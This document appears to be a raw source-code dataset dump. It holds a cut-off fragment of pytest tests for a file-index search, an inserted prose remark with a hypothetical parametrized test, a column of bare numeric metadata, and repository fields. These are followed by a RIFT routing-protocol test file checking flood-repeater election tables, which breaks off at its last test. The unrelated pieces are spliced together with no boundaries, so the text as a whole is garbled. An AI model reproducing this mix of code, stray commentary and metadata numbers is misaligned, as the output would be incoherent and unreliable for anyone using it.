timestamp=int(initial_time.timestamp()), pattern=Pattern("/src/dir")
)
assert len(results) == 3
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified
== initial_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_all__from_head__finds_all_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()))
assert len(results) == 5
assert Path("/src/one.txt") in results
assert Path("/src/two.txt") in results
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified == update_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_all__from_past__finds_all_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(initial_time.timestamp()))
assert len(results) == 5
assert Path("/src/one.txt") in results
assert Path("/src/two.txt") in results
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified
== initial_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_missing__returns_zero(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()), pattern=Pattern("/does/not.exist"))
assert len(results) == 0
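Each from_head/from_past pair above repeats the same assertions with a different timestamp. A parametrized sketch of the single-file case is shown below; it is hypothetical and relies on the same fs/freezer fixtures and IndexTestBase.mock_two_states used by the tests above.
import pytest
class TestIndexSearchParametrized(IndexTestBase):
    @pytest.mark.parametrize("from_head", [True, False])
    def test_search_file__finds_single_file(self, fs, freezer, from_head):
        initial_time, update_time = self.mock_two_states(fs, freezer)
        # HEAD searches use the current time; past searches use the first snapshot
        when = int(time()) if from_head else int(initial_time.timestamp())
        expected = update_time if from_head else initial_time
        results = search(timestamp=when, pattern=Pattern("/src/dir/three.txt"))
        assert len(results) == 1
        assert Path("/src/dir/three.txt") in results
        assert results[Path("/src/dir/three.txt")].last_modified == int(
            expected.timestamp()
        )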
| 39.083333
| 88
| 0.644456
| 493
| 3,752
| 4.69574
| 0.115619
| 0.062203
| 0.086393
| 0.084665
| 0.889849
| 0.848812
| 0.848812
| 0.848812
| 0.848812
| 0.848812
| 0
| 0.002415
| 0.227612
| 3,752
| 95
| 89
| 39.494737
| 0.796411
| 0.009861
| 0
| 0.592105
| 0
| 0
| 0.133531
| 0.025897
| 0
| 0
| 0
| 0
| 0.407895
| 1
| 0.092105
| false
| 0
| 0.052632
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0e1fc83f5c66e904377380b1e887b58301e296d
| 84,949
|
py
|
Python
|
tests/test_node_flood_repeater_election.py
|
pthubert/rift-python
|
41b596530be91ca8545f5022fead1d6d2021d319
|
[
"Apache-2.0"
] | null | null | null |
tests/test_node_flood_repeater_election.py
|
pthubert/rift-python
|
41b596530be91ca8545f5022fead1d6d2021d319
|
[
"Apache-2.0"
] | null | null | null |
tests/test_node_flood_repeater_election.py
|
pthubert/rift-python
|
41b596530be91ca8545f5022fead1d6d2021d319
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
import constants
import encoding.ttypes
import engine
import interface
import neighbor
import node
import packet_common
# pylint:disable=too-many-locals
# pylint:disable=invalid-name
# pylint:disable=line-too-long
# pylint:disable=too-many-lines
NODE_SYSID = 1
NODE_LEVEL = 0
PARENT_LEVEL = 1
GRANDPARENT_LEVEL = 2
SOUTH = constants.DIR_SOUTH
NORTH = constants.DIR_NORTH
EW = constants.DIR_EAST_WEST
def make_test_node(parents, additional_node_config=None):
test_engine = engine.Engine(
passive_nodes=[],
run_which_nodes=[],
interactive=False,
telnet_port_file=None,
ipv4_multicast_loopback=False,
ipv6_multicast_loopback=False,
log_level=logging.CRITICAL,
config={}
)
test_engine.floodred_system_random = 11111111111111111111 # Make unit test deterministic
node_config = {
"name": "node" + str(NODE_SYSID),
"systemid": NODE_SYSID,
"level": NODE_LEVEL,
"skip-self-orginated-ties": True # The test is in control of what TIEs are in the DB
}
if additional_node_config:
node_config.update(additional_node_config)
test_node = node.Node(node_config, test_engine)
# Create fake interfaces for parents (in state 3-way)
for parent_sysid in parents.keys():
make_parent_interface(test_node, parent_sysid)
# Fill TIE-DB for the first time
update_test_node(test_node, parents)
return test_node
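# Usage sketch (illustrative, mirrors test_1x1 below): a node whose single
# parent 11 reaches the single grandparent 21:
#   test_node = make_test_node({11: [21]})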
def update_test_node(test_node, parents):
grandparents = compute_grandparents_connectivity(parents)
# Empty the TIE-DB (we are going to re-build it from scratch)
test_node.tie_metas.clear()
# Add self-originated Node-TIE for node to TIE-DB
neighbors = []
for parent_sysid, _grandparent_sysids in parents.items():
neighbor_info = (PARENT_LEVEL, parent_sysid)
neighbors.append(neighbor_info)
node_tie_packet = make_node_tie_packet(NODE_SYSID, NODE_LEVEL, neighbors)
test_node.store_tie_packet(node_tie_packet)
# Add Node-TIEs for parents to TIE-DB
for parent_sysid, grandparent_sysids in parents.items():
neighbors = []
neighbor_info = (NODE_LEVEL, NODE_SYSID)
neighbors.append(neighbor_info)
for grandparent_sysid in grandparent_sysids:
neighbor_info = (GRANDPARENT_LEVEL, grandparent_sysid)
neighbors.append(neighbor_info)
node_tie_packet = make_node_tie_packet(parent_sysid, PARENT_LEVEL, neighbors)
test_node.store_tie_packet(node_tie_packet)
# Add Node-TIEs for grandparents to TIE-DB
for grandparent_sysid, parent_sysids in grandparents.items():
neighbors = []
for parent_sysid in parent_sysids:
neighbor_info = (PARENT_LEVEL, parent_sysid)
neighbors.append(neighbor_info)
node_tie_packet = make_node_tie_packet(grandparent_sysid, GRANDPARENT_LEVEL, neighbors)
test_node.store_tie_packet(node_tie_packet)
def make_node_tie_packet(sysid, level, neighbors):
node_tie = packet_common.make_node_tie_packet(
name="node" + str(sysid),
level=level,
direction=SOUTH,
originator=sysid,
tie_nr=1,
seq_nr=1,
lifetime=100)
for neighbor_info in neighbors:
neighbor_level, neighbor_sysid = neighbor_info
local_link_id = neighbor_sysid
remote_link_id = sysid
link_id_pair = encoding.ttypes.LinkIDPair(local_link_id, remote_link_id)
link_ids = set([link_id_pair])
neighbor_tie_element = encoding.ttypes.NodeNeighborsTIEElement(
level=neighbor_level,
cost=1,
link_ids=link_ids,
bandwidth=100)
node_tie.element.node.neighbors[neighbor_sysid] = neighbor_tie_element
return node_tie
def make_parent_interface(test_node, parent_sysid):
intf_name = "intf" + str(parent_sysid)
intf_config = {
"name": intf_name
}
intf = test_node.create_interface(intf_config)
lie_neighbor = encoding.ttypes.Neighbor(parent_sysid, 0)
lie_packet = encoding.ttypes.LIEPacket(
name="intf" + str(test_node.system_id),
local_id=0,
flood_port=0,
link_mtu_size=1500,
neighbor=lie_neighbor,
pod=0,
nonce=0,
node_capabilities=None,
holdtime=3,
not_a_ztp_offer=False,
you_are_flood_repeater=False,
label=None)
packet_content = encoding.ttypes.PacketContent(lie=lie_packet)
packet_header = encoding.ttypes.PacketHeader(
sender=parent_sysid,
level=PARENT_LEVEL)
lie_protocol_packet = encoding.ttypes.ProtocolPacket(packet_header, packet_content)
# pylint:disable=protected-access
intf.fsm._state = interface.Interface.State.THREE_WAY
intf.neighbor = neighbor.Neighbor(
lie_protocol_packet=lie_protocol_packet,
neighbor_address="1.1.1.1",
neighbor_port=1)
def check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config=None):
test_node = make_test_node(parents, additional_node_config)
test_node.floodred_elect_repeaters()
if expected_parents:
assert test_node.floodred_parents_table().to_string() == expected_parents
if expected_grandparents:
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
return test_node
def compute_grandparents_connectivity(parents):
grandparents = {}
for parent_sysid, grandparent_sysids in parents.items():
for grandparent_sysid in grandparent_sysids:
if grandparent_sysid not in grandparents:
grandparents[grandparent_sysid] = []
if parent_sysid not in grandparents[grandparent_sysid]:
grandparents[grandparent_sysid].append(parent_sysid)
return grandparents
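# Hand-checked example of the inversion above (illustrative only):
#   compute_grandparents_connectivity({11: [21, 22], 12: [21]})
#   == {21: [11, 12], 22: [11]}
# i.e. each grandparent maps to the parents through which it can be reached.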
def test_3x3_full():
# 3 parents (11, 12, 13)
# 3 grandparents (21, 22, 23)
# Full connectivity between parents and grandparents
packet_common.add_missing_methods_to_thrift()
parents = {
11: [21, 22, 23],
12: [21, 22, 23],
13: [21, 22, 23]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 1: 3-3 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 3 | 1: 3-3 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 3 | 1: 3-3 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_full():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Full connectivity between parents and grandparents
packet_common.add_missing_methods_to_thrift()
parents = {
11: [21, 22, 23, 24, 25, 26, 27, 28],
12: [21, 22, 23, 24, 25, 26, 27, 28],
13: [21, 22, 23, 24, 25, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [21, 22, 23, 24, 25, 26, 27, 28],
16: [21, 22, 23, 24, 25, 26, 27, 28],
17: [21, 22, 23, 24, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 26, 27, 28]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 8 | 1: 8-8 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 8 | 1: 8-8 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_1x1():
# 1 parent (11)
# 1 grandparent (21)
# Full connectivity between parents and grandparents (of course)
# In this test case, the parent only has 1 grandparent, so it is not possible to meet the
# desired redundancy of 2 separate paths to each grandparent
packet_common.add_missing_methods_to_thrift()
parents = {
11: [21]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_partial_connectivity_fully_redundant_coverage():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Partial connectivity between parents and grandparents:
# Full redundant coverage of all grandparents is possible
# Default shuffle similarity of 2
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-6 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 3: 2-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_partial_connectivity_partial_redundant_coverage():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Partial connectivity between parents and grandparents:
# Some grandparents are fully covered, others not
# Default shuffle similarity of 2
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [21, 23, 26, 28],
12: [ 22, 24, 27 ],
13: [21 ],
14: [ 22, ],
15: [ 24, 27 ],
16: [ 23, 26, 27 ],
17: [ 22, 24, 26 ],
18: [21, 24, 25, 27 ]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 2 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 2 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_partial_connectivity_no_redundant_coverage():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Partial connectivity between parents and grandparents:
# None of the grandparents are fully covered
# Default shuffle similarity of 2
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [ 23 ],
12: [ 28],
13: [21 ],
14: [ 22 ],
15: [ 24 ],
16: [ 26 ],
17: [ 27 ],
18: [ 25 ]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
